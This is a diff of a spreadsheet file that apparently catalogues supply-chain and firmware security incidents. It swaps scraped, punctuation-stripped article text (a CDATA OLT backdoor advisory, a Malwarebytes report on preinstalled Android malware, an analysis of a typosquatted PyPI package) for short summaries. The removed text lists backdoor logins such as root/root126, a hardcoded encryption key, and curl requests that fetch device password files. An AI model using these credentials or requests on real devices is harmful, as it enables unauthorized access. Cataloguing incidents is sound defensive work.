httpipcgionunametxt curl httpipcgiwebpasswdtxt curl httpipcgiweblogintxt details weak encryption algorithm custom encryption algorithm used store encrypted passwords algorithm password hardcoded value j7alyz98ssd5hfsggjmj8ssda2s0i3g shown details insecure management interfaces default appliance managed remotely http telnet snmp doesnt support ssltls http attacker intercept passwords sent cleartext mitm management appliance dorks epon system optilink gepon vendor response fulldisclosure applied believe backdoors intentionally placed vendor report timeline vulnerabilities found advisory written public advisory sent mailing lists vsol removed mitre provides cve202029054 cve202029055 cve202029056 cve202029057 cve202029058 cve202029059 cve202029060 cve202029061 cve202029062 cve202029063 credits vulnerabilities found pierre pierrekimsec alexandre torres references httpspierrekimgithubioadvisories2020cdata0x00olttxt httpspierrekimgithubioblog20200707cdataolt0dayvulnerabilitieshtml disclaimer advisory licensed creative commons attribution noncommercial sharealike license httpcreativecommonsorglicensesbyncsa30 published pierre pierrekimsecgmailcom</t>
+          <t>Numerous OLT models made by CDATA have multiple vulnerabilities in the device firmware that allow for remote access, code execution, decyryption of data, and other exploits.  The reseacher who discovered these vulnerabilities believes they were intentionally included.</t>
         </is>
       </c>
       <c r="D144" t="inlineStr">
         <is>
           <t>https://pierrekim.github.io/blog/2020-07-07-cdata-olt-0day-vulnerabilities.html</t>
-        </is>
-      </c>
-      <c r="E144" t="inlineStr">
-        <is>
-          <t>['research', 'home', 'feed', 'multiple', 'vulnerability', 'olt', 'product', 'description', 'olt', 'olt', 'different', 'brand', 'ftth', 'connectivity', 'large', 'number', 'client', 'ont', 'device', 'multiple', 'uplink', 'internet', 'connectivity', 'ont', 'client', 'vulnerability', 'olt', 'late', 'firmware', 'version', 'static', 'analysis', 'vulnerability', 'available', 'model', 'similar', '9016a', 'fd1204sr2', 'fd1204sn', 'fd1216sr1', 'fd1608gs', 'fd1608sn', 'fd1616gs', 'binary', 'information', 'vendor', 'honghualing', 'industrial', 'explanation', 'architecture', 'previous', 'research', 'httppierrekimgithubioblog20161101gponftthnetworksinsecurityhtml', 'summary', 'summary', 'backdoor', 'access', 'cve202029062', 'credential', 'credential', 'cleartext', 'telnet', 'cve202029054', 'shell', 'root', 'privilege', 'credential', 'credential', 'cleartext', 'cve202029058', 'weak', 'encryption', 'algorithm', 'insecure', 'management', 'interface', 'cve202029055', 'detail', 'access', 'server', 'appliance', 'reachable', 'interface', 'interface', 'ont', 'firmware', 'backdoor', 'credential', 'complete', 'list', 'backdoor', 'undocumented', 'credential', 'attacker', 'complete', 'administrator', 'access', 'previous', 'version', 'login', 'suma123', 'password', 'recent', 'version', 'login', 'login', 'root', 'password', 'root126', 'login', 'guest', 'password', 'empty', 'authentication', 'process', 'credential', 'credential', 'firmware', 'image', 'credential', 'vendor', 'version', 'firmware', 'appearance', 'different', 'access', 'suma123', 'telnet', 'command', 'system', 'hardware', 'software', 'time', 'copyright', 'right', 'system', 'alarm', 'bestsy', 'information', 'eponworkmode', 'configure', 'rapid', 'ring', 'configure', 'igmp', 'interface', 'interface', 'type', 'configure', 'system', 'address', 'logout', 'exit', 'system', 'macaddresstable', 'ctrlcard', 'dynamic', 'address', 'table', 'management', 'mirror', 'configure', 'switch', 'mirror', 'configure', 'authentication', 'group', 'rapid', 'spanning', 'tree', 'protocol', 'configuration', 'show', 'show', 'system', 'configuration', 'system', 'configure', 'systerm', 'trunk', 'trunk', 'config', 'mode', 'delete', 'relational', 'configuration', 'vlan', 'vlan', 'guest', 'empty', 'telnet', 'command', 'system', 'hardware', 'software', 'time', 'copyright', 'right', 'local', 'configuration', 'command', 'broadcast', 'write', 'message', 'user', 'clear', 'clear', 'screen', 'history', 'show', 'command', 'history', 'logout', 'system', 'network', 'host', 'show', 'system', 'configuration', 'trace', 'host', 'tree', 'show', 'command', 'tree', 'local', 'configuration', 'command', 'auth', 'auth', 'mode', 'show', 'dhcp', 'configuration', 'exectimeout', 'show', 'console', 'timeout', 'configuration', 'current', 'port', 'address', 'show', 'switch', 'mirror', 'configuration', 'olt', 'configuration', 'onuposition', 'show', 'position', 'current', 'runningconfiguration', 'current', 'information', 'system', 'show', 'system', 'configuration', 'trunk', 'show', 'trunk', 'configuration', 'vlan', 'show', 'vlan', 'configuration', 'server', 'root', 'root126', 'telnet', 'system', 'hardware', 'software', 'time', 'copyright', 'right', 'usernameroot', 'passwordroot126', 'local', 'configuration', 'command', 'auth', 'configure', 'authentication', 'mode', 'cdtsy', 'configure', 'information', 'configure', 'dhcp', 'exectimeout', 'timeout', 'value', 'configure', 'igmp', 'ctrlcard', 'dynamic', 'address', 'table', 'management', 'mirror', 'configure', 'switch', 'configure', 'reset', 'reset', 'value', 'rapid', 'spanning', 'tree', 'protocol', 'configuration', 'swmode', 'basic', 'switch', 'mode', 'swport', 'switch', 'port', 'config', 'mode', 'system', 'configure', 'systerm', 'trunk', 'trunk', 'config', 'mode', 'vlan', 'vlan', 'broadcast', 'write', 'message', 'user', 'clear', 'clear', 'screen', 'show', 'command', 'history', 'logout', 'system', 'network', 'host', 'show', 'system', 'configuration', 'trace', 'host', 'tree', 'show', 'command', 'tree', 'display', 'user', 'system', 'hardware', 'software', 'time', 'copyright', 'right', 'local', 'configuration', 'command', 'auth', 'configure', 'authentication', 'mode', 'configure', 'dhcp', 'exectimeout', 'timeout', 'value', 'configure', 'igmp', 'ctrlcard', 'dynamic', 'address', 'table', 'management', 'mirror', 'configure', 'switch', 'configure', 'reset', 'reset', 'value', 'rapid', 'spanning', 'tree', 'protocol', 'configuration', 'swmode', 'basic', 'switch', 'mode', 'swport', 'switch', 'port', 'config', 'mode', 'system', 'configure', 'systerm', 'trunk', 'trunk', 'config', 'mode', 'vlan', 'vlan', 'broadcast', 'write', 'message', 'user', 'clear', 'clear', 'screen', 'show', 'command', 'history', 'logout', 'system', 'network', 'host', 'show', 'system', 'configuration', 'trace', 'host', 'tree', 'show', 'command', 'tree', 'display', 'user', 'access', 'attacker', 'configuration', 'overwrite', 'firmware', 'detail', 'credential', 'credential', 'cleartext', 'telnet', 'part', 'attacker', 'working', 'access', 'backdoor', 'access', 'telnet', 'possible', 'extract', 'administrator', 'credential', 'system', 'server', 'version', 'buildtime', 'administrator', 'logincleartext', 'password', 'passwordcleartext', 'detail', 'shell', 'root', 'privilege', 'part', 'attacker', 'working', 'access', 'backdoor', 'access', 'telnet', 'command', 'injection', 'attacker', 'command', 'root', 'command', 'injection', 'part', 'case', 'metasploit', 'result', 'command', 'configuration', 'test', 'uncompress', 'file', 'server', 'attacker', 'machine', 'type', 'model', 'instruction', 'timer', 'extra', 'interrupt', 'vector', 'hardware', 'watchpoint', 'mips16', 'vced', 'exception', 'available', 'vcei', 'exception', 'available', 'possible', 'information', 'webserver', 'system', 'configuration', 'export', 'optlighttpdwebcgiouttxt', 'machine', 'httpipcgiouttxt', 'export', 'oldpwd', 'export', 'pathsbinusrsbinbinusrbin', 'export', 'shellbinsh', 'export', 'export', 'userroot', 'root', 'appliance', 'pdflush', 'pdflush', 'binsh', 'etcrc', 'bknevt', 'fd1008sdat', 'fd1008sdat', 'fd1008sdat', 'fd1008sdat', 'fd1008sdat', 'fd1008sdat', 'fd1008sdat', 'fd1008sdat', 'fd1008sdat', 'fd1008sdat', 'fd1008sdat', 'fd1008sdat', 'fd1008sdat', 'fd1008sdat', 'fd1008sdat', 'fd1008sdat', 'fd1008sdat', 'fd1008sdat', 'fd1008sdat', 'fd1008sdat', 'fd1008sdat', 'fd1008sdat', 'fd1008sdat', 'fd1008sdat', 'fd1008sdat', 'fd1008sdat', 'fd1008sdat', 'fd1008sdat', 'fd1008sdat', 'fd1008sdat', 'fd1008sdat', 'fd1008sdat', 'server', 'appliance', 'reachable', 'interface', 'interface', 'ont', 'cuttingedge', 'technology', 'shawarma', 'able', 'reboot', 'vendor', 'command', 'devurandom', 'hexdump', 'cdone', 'device', 'reboot', 'next', 'second', 'led', 'blink', 'tree', 'detail', 'credential', 'credential', 'cleartext', 'http', 'server', 'appliance', 'reachable', 'interface', 'interface', 'ont', 'authentication', 'telnet', 'credential', 'snmp', 'community', 'file', 'optlighttpdwebcgisnmpreadtxt', 'optlighttpdwebcgisnmpwritetxt', 'optlighttpdwebcgiweblogintxt', 'optlighttpdwebcgiwebpasswdtxt', 'optlighttpdwebcgionunametxt', 'optlighttpdwebcgioemtxt', 'httpipcgisnmpreadtxt', 'httpipcgisnmpwritetxt', 'httpipcgiweblogintxt', 'detail', 'weak', 'encryption', 'custom', 'encryption', 'store', 'password', 'value', 'detail', 'management', 'interface', 'default', 'appliance', 'telnet', 'snmp', 'attacker', 'intercept', 'password', 'cleartext', 'mitm', 'management', 'appliance', 'gepon', 'vendor', 'response', 'fulldisclosure', 'backdoor', 'vendor', 'report', 'timeline', 'vulnerability', 'advisory', 'public', 'advisory', 'mailing', 'list', 'vsol', 'mitre', 'cve202029055', 'cve202029062', 'credit', 'vulnerability', 'alexandre', 'reference', 'disclaimer', 'advisory', 'creative', 'commons', 'attribution', 'noncommercial', 'sharealike', 'license', 'httpcreativecommonsorglicensesbyncsa30']</t>
         </is>
       </c>
     </row>
@@ -4199,17 +3633,12 @@
       </c>
       <c r="C145" t="inlineStr">
         <is>
-          <t>skip content search search malwarebytescom search contact personal support business support quote contact press partner programs submit vulnerability company malwarebytes careers news press sign myaccount sign manage personal teams subscription cloud console sign manage cloud business products partner portal sign management resellers msps personal personal products malwarebytes premium malwarebytes privacy malwarebytes identity theft protection malwarebytes browser guard malwarebytes teamssmall offices adwcleaner windows find right product plans infected already clean device solutions free antivirus free virus scan removal windows antivirus antivirus android antivirus chromebook antivirus digital footprint scan personal pricing manage subscription visit support page business business bundles threatdown bundles protect endpoints powerfully simple costeffective bundles education bundles secure students institution cyberattacks technology highlights managed detection response deploy fullymanaged monitoring investigation remediation endpoint detection response prevent attacks catches others miss explore portfolio visualize optimize posture minutes learn advisor available every bundle pricing pricing personal pricing protect personal devices data small officehome office pricing protect team’s devices data business pricing employees step corporate endpoint save partners partners explore partnerships partner solutions resellers managed service providers computer repair technology partners affiliate partners contact resources resources learn cybersecurity antivirus malware ransomware malwarebytes labs blog glossary center business resources reviews analyst reports case studies press news reports state malware report read report support support technical support personal support business support premium services forums vulnerability disclosure report false positive featured content activate malwarebytes privacy windows device content product videos free download search search search malwarebytescom search subscribe android news found another phone preinstalled malware lifeline assistance program posted july nathan collier discovered another phone model preinstalled malware provided lifeline assistance program assurance wireless virgin mobile time american network solutions ul40 running android writing back january—” united states governmentfunded phones come preinstalled unremovable malware “—we heard outcry malwarebytes patrons claimed various phone models experiencing similar issues unimax u683cl however it’s hard verify cases without physically mobile device hand reason could confidently write cases publicly thankfully malwarebytes patron committed proving case thank malwarebytes patron rameez anwar sending ul40 research cybersecurity expertise persistence case surely others clarification availability clarify unclear phone question ul40 currently available assurance wireless however ul40 user manual listed time writing assurance wireless website therefore assume still available assurance wireless customers regardless ul40 sold point customers could still affected infection types like u683cl ul40 comes infected compromised settings wireless update although true infected malware variants infections similar unique infection characteristics here’s rundown infected apps settings package name comandroidsettings 7ada4aaea49383499b405e4ce0a9447f name settings detection androidtrojandownloaderwotbysek settings exactly sounds like—it required system used control mobile device’s settings thus removing would leave device unusable case ul40 infected androidtrojandownloaderwotbysek proof infection based several similarities variants downloader wotby although infected settings heavily obfuscated able find identical malicious code additionally shares receiver name comsekyac service name comsekyas activity names comsekyst comsekyst2 comsekyst3 variants also share text file found assets directory named wiztxt appears list “top apps” download thirdparty store here’s snippet code text file fair malicious activity triggered infected settings expecting kind notification browser popup populated info code displayed unfortunately never happened also didn’t spend normal amount time typical user would mobile device card installed device could impact malware behaves nevertheless enough evidence settings ability download apps thirdparty store okay reason detection stands although unsettling it’s important note apps thirdparty store appear malwarefree verified manually downloading couple analysis that’s malicious versions couldn’t uploaded later date verify every sample nevertheless believe sample verify holds true apps site circumstances even ans’s settings downloaded list it’s still nefarious settings seen u683cl wirelessupdate package name comfotawirelessupdate 282c8c0f0d089e3cd522b4315c48e201 name wirelessupdate detections three variants androidpupriskwareautoinsfota variants fscbv fbcv wirelessupdate categized potentially unwanted program riskware autoinstaller ability autoinstall apps without user consent knowledge also functions mobile device’s main source updating patches updates androidpupriskwareautoinsfota particular known installing various variants androidtrojanhiddenads —and indeed fact auto installed four different variants hiddenads seen package name comcoveringtroopsmerican 66c7451e7c87ad5145596012c6e9f9a0 name merica detection androidtrojanhiddenadsmeri package name comsstfskcleanmaster 286ab10a7f1dde7e3a30238d1d61aff4 name clean master detection androidtrojanhiddenadsber package name comsffwsafdsufds 4b4e307b32d7bb2ff89812d4264e5214 name beauty detection androidtrojanhiddenadssffw package name comslackenworkmischie 0ff11fcb09415f0c542c459182cca9c6 name mischi detection androidtrojanhiddenadsmis payload drop verification might wondering “how verify preinstalled infected system apps dropping payloads” process works follows disable upon initially setting mobile device cases picking disable easy decide that’s disabling settings renders phone unusable disabling wirelessupdate obvious choice cases next step process waiting couple weeks anything happens sometimes need wait long malware drop payloads nothing happens couple weeks it’s time reenable infected system start waiting game using process found case u683cl settings culprit ul40 seeing dropped payloads weeks reenabled wirelessupdate within hours installed four hiddenads variants caught redhanded wirelessupdate findings imagine left wondering correlation coincidence know mobile devices infected system apps however malware variants u683cl model ul40 different result initially didn’t think ties brands summed coincidence rather correlation stumbled upon evidence suggesting otherwise settings found ul40 signed digital certificate common name teleepoch searching teleepoch comes company teleepoch along link website right homepage teleepoch states teleepoch registered brand “umx” united states let’s review settings found ul40 digital certificate signed company registered brand scoreboard that’s different settings apps different malware variants different phone manufactures models appear back teleepoch additionally thus brands found preinstalled malware settings lifeline assistance program research correlation looking cases support system models might preinstalled malware that’s found record another model boasted preinstalled malware within comments article january discovered exact malware variants u683cl within previous support tickets hard proof infected androidtrojandropperagentumx androidpupriskwareautoinsfotafbcvd driving home triage teleepoch correlation solutions utmost faith quickly find resolution issue stated update february section january writing silver lining find settings nearly vicious thus urgency severe time around meantime frustrated users ul40 halt reinfection hiddenads using method uninstall wirelessupdate current user details link removal instructions adups warning make sure read restoring apps onto device without factory reset rare case need revertrestore instance like restore wirelessupdate check important system updates thisthese commands step uninstalling adups command line remove shell uninstall –user comfotawirelessupdate budget equate malware tradeoffs choosing budget mobile device expected tradeoffs performance battery life storage size screen quality list things order make mobile device light wallet however budget never mean compromising one’s safety preinstalled malware period share article related articles news disturbing robocaller fined million march robocaller spoofed local phone number presented targets inflammatory disturbing content received hefty fine continue reading comments news meta abandon social media tracking tool crowdtangle march meta retire social media tracking tool crowdtangle august awkward timing given amount important elections year continue reading comments exploits vulnerabilities news patch mozilla patches critical vulnerabilities firefox march mozilla released update firefox critical vulnerabilities together allowed attacker escape sandbox continue reading comments news privacy ransomware vans warns customers data breach march vans warns customers phishing fraud attacks aftermath ransomware attack december continue reading comments podcast securing home network long tiresome entirely worth carey parker lock code s05e07 march week lock code podcast speak carey parker importance process securing home network continue reading comments author nathan collier full time mobile malware researcher part time endurance athlete world traveler nerdy traveling mobile malware contributors center podcast glossary scams cyberprotection every personal windows antivirus antivirus android antivirus free antivirus devices malwarebytes company contact careers news press blog scholarship forums business small businesses midsize business larger enterprise endpoint protection endpoint detection response managed detection response partners managed service provider program resellers account sign solutions digital footprint scan rootkit scanner trojan scanner virus scanner spyware scanner password generator anti ransomware protection address albert quay floor cork x8n6 ireland freedom circle 12th floor santa clara learn malware hacking phishing ransomware computer virus antivirus twitter facebook linkedin youtube instagram cybersecurity info can’t live without want stay informed latest news cybersecurity sign newsletter learn protect computer threats email address english legal privacy accessibility compliance certifications vulnerability disclosure terms service rights reserved select language</t>
+          <t>MalwareBytes found another phone model with pre-installed malware provided from the Lifeline Assistance program via Assurance Wireless by Virgin Mobile.  This time, an ANS (American Network Solutions) UL40 running Android OS 7.1.1.</t>
         </is>
       </c>
       <c r="D145" t="inlineStr">
         <is>
           <t>https://blog.malwarebytes.com/android/2020/07/we-found-yet-another-phone-with-pre-installed-malware-via-the-lifeline-assistance-program/</t>
-        </is>
-      </c>
-      <c r="E145" t="inlineStr">
-        <is>
-          <t>['content', 'search', 'search', 'search', 'contact', 'personal', 'support', 'business', 'support', 'contact', 'press', 'partner', 'program', 'vulnerability', 'company', 'career', 'news', 'press', 'sign', 'myaccount', 'sign', 'personal', 'team', 'subscription', 'sign', 'cloud', 'business', 'product', 'partner', 'portal', 'sign', 'management', 'reseller', 'msp', 'personal', 'personal', 'product', 'identity', 'office', 'adwclean', 'window', 'right', 'product', 'plan', 'clean', 'device', 'solution', 'free', 'footprint', 'personal', 'pricing', 'subscription', 'visit', 'support', 'page', 'business', 'business', 'bundle', 'threatdown', 'bundle', 'endpoint', 'simple', 'costeffective', 'bundle', 'education', 'bundle', 'student', 'institution', 'cyberattack', 'technology', 'highlight', 'detection', 'response', 'fullymanaged', 'monitoring', 'investigation', 'remediation', 'endpoint', 'detection', 'response', 'attack', 'other', 'portfolio', 'optimize', 'posture', 'minute', 'advisor', 'available', 'bundle', 'pricing', 'pricing', 'personal', 'pricing', 'personal', 'device', 'data', 'small', 'officehome', 'office', 'pricing', 'protect', 'team', 'device', 'data', 'business', 'pricing', 'employee', 'corporate', 'endpoint', 'partner', 'partner', 'partnership', 'partner', 'solution', 'reseller', 'service', 'provider', 'computer', 'repair', 'technology', 'partner', 'affiliate', 'partner', 'contact', 'resource', 'resource', 'cybersecurity', 'center', 'business', 'resource', 'review', 'analyst', 'case', 'study', 'news', 'report', 'support', 'support', 'technical', 'support', 'personal', 'support', 'business', 'support', 'premium', 'service', 'forum', 'vulnerability', 'disclosure', 'report', 'false', 'positive', 'content', 'malwarebyte', 'device', 'content', 'product', 'video', 'free', 'download', 'search', 'search', 'search', 'search', 'subscribe', 'phone', 'lifeline', 'assistance', 'program', 'phone', 'model', 'malware', 'lifeline', 'assistance', 'program', 'assurance', 'wireless', 'network', 'solution', 'ul40', 'android', 'writing', 'governmentfunded', 'phone', 'unremovable', 'malware', 'outcry', 'malwarebyte', 'patron', 'various', 'phone', 'model', 'similar', 'issue', 'u683cl', 'hard', 'verify', 'case', 'mobile', 'device', 'hand', 'reason', 'case', 'patron', 'case', 'anwar', 'ul40', 'research', 'cybersecurity', 'expertise', 'persistence', 'case', 'other', 'clarification', 'availability', 'unclear', 'phone', 'question', 'available', 'assurance', 'wireless', 'ul40', 'user', 'manual', 'time', 'assurance', 'wireless', 'website', 'available', 'assurance', 'wireless', 'customer', 'point', 'customer', 'infection', 'type', 'setting', 'wireless', 'update', 'true', 'malware', 'variant', 'infection', 'similar', 'unique', 'infection', 'characteristic', 'rundown', 'app', 'setting', 'package', 'name', 'comandroidsetting', 'name', 'setting', 'detection', 'setting', 'system', 'control', 'mobile', 'device', 'setting', 'device', 'unusable', 'case', 'proof', 'infection', 'several', 'similarity', 'variant', 'downloader', 'wotby', 'infected', 'setting', 'able', 'identical', 'malicious', 'code', 'receiver', 'name', 'comsekyac', 'service', 'name', 'comsekyas', 'activity', 'name', 'comsekyst3', 'variant', 'text', 'file', 'asset', 'directory', 'wiztxt', 'list', 'top', 'app', 'download', 'thirdparty', 'store', 'snippet', 'code', 'text', 'file', 'fair', 'malicious', 'activity', 'setting', 'kind', 'notification', 'browser', 'info', 'code', 'normal', 'amount', 'time', 'typical', 'user', 'mobile', 'device', 'card', 'device', 'malware', 'enough', 'evidence', 'setting', 'ability', 'app', 'thirdparty', 'store', 'reason', 'detection', 'important', 'note', 'app', 'thirdparty', 'store', 'malwarefree', 'couple', 'analysis', 'malicious', 'version', 'late', 'date', 'sample', 'sample', 'verify', 'true', 'app', 'site', 'circumstance', 'an', 'setting', 'list', 'nefarious', 'setting', 'u683cl', 'package', 'name', 'comfotawirelessupdate', 'name', 'wirelessupdate', 'detection', 'variant', 'androidpupriskwareautoinsfota', 'variant', 'unwanted', 'program', 'riskware', 'ability', 'autoinstall', 'app', 'user', 'consent', 'knowledge', 'mobile', 'device', 'main', 'source', 'patch', 'particular', 'various', 'variant', 'androidtrojanhiddenad', 'fact', 'auto', 'different', 'variant', 'hiddenad', 'package', 'name', 'detection', 'androidtrojanhiddenadsmeri', 'package', 'name', 'comsstfskcleanmaster', 'name', 'clean', 'master', 'detection', 'package', 'name', 'name', 'beauty', 'detection', 'androidtrojanhiddenadssffw', 'package', 'name', 'comslackenworkmischie', 'name', 'mischi', 'detection', 'payload', 'drop', 'verification', 'infected', 'system', 'app', 'payload', 'process', 'work', 'disable', 'mobile', 'device', 'case', 'disable', 'decide', 'setting', 'phone', 'unusable', 'obvious', 'choice', 'case', 'next', 'step', 'process', 'couple', 'week', 'long', 'malware', 'drop', 'payload', 'couple', 'week', 'time', 'reenable', 'system', 'game', 'process', 'case', 'u683cl', 'setting', 'ul40', 'seeing', 'payload', 'week', 'hour', 'hiddenad', 'variant', 'redhanded', 'wirelessupdate', 'finding', 'correlation', 'coincidence', 'mobile', 'device', 'system', 'app', 'variant', 'u683cl', 'model', 'ul40', 'different', 'result', 'tie', 'brand', 'coincidence', 'correlation', 'evidence', 'setting', 'digital', 'certificate', 'common', 'name', 'teleepoch', 'company', 'link', 'website', 'right', 'homepage', 'review', 'setting', 'ul40', 'digital', 'certificate', 'company', 'brand', 'scoreboard', 'different', 'setting', 'app', 'different', 'malware', 'variant', 'different', 'phone', 'manufacture', 'model', 'brand', 'malware', 'setting', 'lifeline', 'assistance', 'program', 'research', 'correlation', 'case', 'system', 'model', 'malware', 'record', 'model', 'malware', 'comment', 'article', 'exact', 'malware', 'variant', 'u683cl', 'previous', 'support', 'ticket', 'hard', 'proof', 'androidtrojandropperagentumx', 'androidpupriskwareautoinsfotafbcvd', 'home', 'triage', 'correlation', 'solution', 'utmost', 'faith', 'resolution', 'issue', 'update', 'section', 'silver', 'lining', 'find', 'setting', 'vicious', 'urgency', 'severe', 'time', 'meantime', 'frustrated', 'user', 'ul40', 'halt', 'reinfection', 'hiddenad', 'method', 'uninstall', 'current', 'user', 'detail', 'removal', 'instruction', 'adup', 'sure', 'app', 'device', 'factory', 'reset', 'rare', 'case', 'revertrestore', 'instance', 'wirelessupdate', 'important', 'system', 'thisthese', 'command', 'uninstalling', 'adup', 'command', 'line', 'shell', 'uninstall', 'user', 'comfotawirelessupdate', 'budget', 'equate', 'malware', 'tradeoff', 'budget', 'mobile', 'device', 'tradeoff', 'performance', 'battery', 'life', 'storage', 'size', 'screen', 'quality', 'list', 'thing', 'order', 'mobile', 'device', 'light', 'wallet', 'budget', 'safety', 'share', 'article', 'article', 'news', 'robocaller', 'local', 'phone', 'number', 'inflammatory', 'disturbing', 'content', 'hefty', 'fine', 'comment', 'news', 'social', 'medium', 'tracking', 'tool', 'meta', 'retire', 'social', 'medium', 'tracking', 'tool', 'awkward', 'timing', 'amount', 'important', 'election', 'year', 'comment', 'news', 'patch', 'critical', 'vulnerability', 'update', 'critical', 'vulnerability', 'attacker', 'sandbox', 'continue', 'comment', 'news', 'privacy', 'ransomware', 'van', 'customer', 'datum', 'breach', 'van', 'customer', 'fraud', 'attack', 'attack', 'comment', 'podcast', 'home', 'network', 'tiresome', 'worth', 'carey', 'parker', 'lock', 'code', 's05e07', 'week', 'lock', 'code', 'podcast', 'carey', 'parker', 'importance', 'process', 'home', 'network', 'comment', 'author', 'full', 'time', 'mobile', 'malware', 'part', 'time', 'endurance', 'athlete', 'world', 'traveler', 'nerdy', 'mobile', 'malware', 'contributor', 'center', 'podcast', 'cyberprotection', 'personal', 'window', 'company', 'contact', 'career', 'news', 'press', 'blog', 'scholarship', 'forum', 'small', 'business', 'business', 'large', 'enterprise', 'endpoint', 'protection', 'endpoint', 'detection', 'response', 'detection', 'response', 'partner', 'service', 'provider', 'program', 'reseller', 'sign', 'solution', 'digital', 'footprint', 'rootkit', 'scanner', 'scanner', 'virus', 'scanner', 'spyware', 'scanner', 'generator', 'freedom', 'circle', '12th', 'floor', 'hacking', 'ransomware', 'computer', 'virus', 'cybersecurity', 'info', 'informed', 'late', 'news', 'cybersecurity', 'sign', 'newsletter', 'computer', 'threat', 'email', 'address', 'privacy', 'accessibility', 'compliance', 'certification', 'vulnerability', 'disclosure', 'term', 'service', 'right', 'select', 'language']</t>
         </is>
       </c>
     </row>
@@ -4224,15 +3653,14 @@
           <t>Google Play Store</t>
         </is>
       </c>
-      <c r="C146" t="inlineStr"/>
+      <c r="C146" t="inlineStr">
+        <is>
+          <t>11 apps containing the Joker malware were found in the Google Play Store.</t>
+        </is>
+      </c>
       <c r="D146" t="inlineStr">
         <is>
           <t>https://research.checkpoint.com/2020/new-joker-variant-hits-google-play-with-an-old-trick/</t>
-        </is>
-      </c>
-      <c r="E146" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -4249,17 +3677,12 @@
       </c>
       <c r="C147" t="inlineStr">
         <is>
-          <t>open sign sign write sign sign analyzing python typosquatting malicious “request” package follow read listen share typosquatting attack attackers upload similar looking package popular package request urllib3 often embedded malicous code typosquatting attack attackers upload similar looking package popular package request urllib3 package repository often embedded malicious code early month michael salsone 0xpopsiclestick spotted malicious package called request package looks similar popular package requests httpspypiorgprojectrequests stars github number downloads victims malicious package significant indicated following tweet wanted dive understanding malicious package answer following questions malicious code injected malicious code triggered contacted michael malicious example request observed malicious package “request” package distributed tarball file nearly size unzipped malicious tarball inside file files inside “request” package seen many cases past malicious code injected setuppy script code would installation stage let’s look content setuppy script setuppy script line setuppy script function call licensecheck registered automatically executed upon script termination case execution setuppy script ends let’s take look function licensecheck licensecheck function code encoded using base64 let’s decode code trying connect remote server matched michael’s analysis httpdexytoprequestcheckso longer accessed could analyze malicious behavior understand commands could done victims conclusion found scanning suspicious patterns installation script would enough malicious code injected regular module used somewhere else setuppy file using different methods import exit handlers function thank michael malicious example analysis pypi software supply chain typosquatting malicious code follow written followers follow help status careers blog privacy terms text speech teams</t>
+          <t>typosquatting package called 'request' (original package 'requests'), the package connects to a C&amp;C server and waits for a command</t>
         </is>
       </c>
       <c r="D147" t="inlineStr">
         <is>
           <t>https://medium.com/@vuducly151092/analyzing-the-python-typosquatting-malicious-request-package-e80aeda925b0</t>
-        </is>
-      </c>
-      <c r="E147" t="inlineStr">
-        <is>
-          <t>['open', 'sign', 'sign', 'sign', 'sign', 'python', 'malicious', 'request', 'package', 'follow', 'share', 'attack', 'attacker', 'similar', 'package', 'popular', 'package', 'request', 'malicous', 'code', 'attack', 'attacker', 'similar', 'package', 'popular', 'package', 'request', 'urllib3', 'package', 'repository', 'malicious', 'code', 'early', 'month', 'malicious', 'package', 'request', 'package', 'similar', 'popular', 'package', 'request', 'star', 'number', 'victim', 'malicious', 'package', 'significant', 'tweet', 'malicious', 'package', 'answer', 'question', 'malicious', 'code', 'malicious', 'code', 'malicious', 'example', 'request', 'malicious', 'package', 'request', 'package', 'tarball', 'file', 'size', 'malicious', 'tarball', 'file', 'file', 'request', 'package', 'many', 'case', 'malicious', 'code', 'setuppy', 'script', 'code', 'installation', 'stage', 'content', 'setuppy', 'script', 'setuppy', 'script', 'line', 'setuppy', 'script', 'function', 'call', 'licensecheck', 'script', 'termination', 'case', 'execution', 'setuppy', 'script', 'look', 'function', 'licensecheck', 'base64', 'code', 'remote', 'server', 'analysis', 'httpdexytoprequestcheckso', 'malicious', 'behavior', 'command', 'victim', 'conclusion', 'suspicious', 'pattern', 'installation', 'script', 'enough', 'malicious', 'code', 'regular', 'module', 'setuppy', 'file', 'different', 'method', 'exit', 'handler', 'function', 'malicious', 'example', 'analysis', 'software', 'supply', 'chain', 'malicious', 'code', 'follow', 'follower', 'help', 'status', 'career', 'blog', 'privacy', 'term', 'text', 'speech', 'team']</t>
         </is>
       </c>
     </row>
@@ -4274,15 +3697,14 @@
           <t>Android Handsets</t>
         </is>
       </c>
-      <c r="C148" t="inlineStr"/>
+      <c r="C148" t="inlineStr">
+        <is>
+          <t>Secure-D, has blocked millions of suspicious subscription requests coming from low-end devices made by Transsion, a Chinese manufacturer of affordable smartphones for the African market. Many of the transaction requests originating from applications seem to be coming from a family of apps called com.mufc, whose source is unknown and which cannot be downloaded from any Android app store. Tecno W2 devices came with Triada-related malware pre-installed.</t>
+        </is>
+      </c>
       <c r="D148" t="inlineStr">
         <is>
           <t>https://www.upstreamsystems.com/well-known-malware-committing-click-ad-fraud-low-end-devices-emerging-markets-uncovered-secure-d/</t>
-        </is>
-      </c>
-      <c r="E148" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -4299,17 +3721,12 @@
       </c>
       <c r="C149" t="inlineStr">
         <is>
-          <t>skip content package search sign teams pricing documentation search sign sign found advisory found footer support help advisories status contact company blog press terms policies policies terms code conduct privacy</t>
+          <t>fallguys contained malicious code that attempted to read local sensitive files and exfiltrate information through a Discord webhook.</t>
         </is>
       </c>
       <c r="D149" t="inlineStr">
         <is>
           <t>https://www.npmjs.com/advisories/1552</t>
-        </is>
-      </c>
-      <c r="E149" t="inlineStr">
-        <is>
-          <t>['content', 'package', 'search', 'sign', 'team', 'documentation', 'search', 'sign', 'sign', 'advisory', 'footer', 'support', 'help', 'advisory', 'status', 'contact', 'company', 'blog', 'press', 'term', 'policy', 'policy', 'term', 'code', 'conduct', 'privacy']</t>
         </is>
       </c>
     </row>
@@ -4326,17 +3743,12 @@
       </c>
       <c r="C150" t="inlineStr">
         <is>
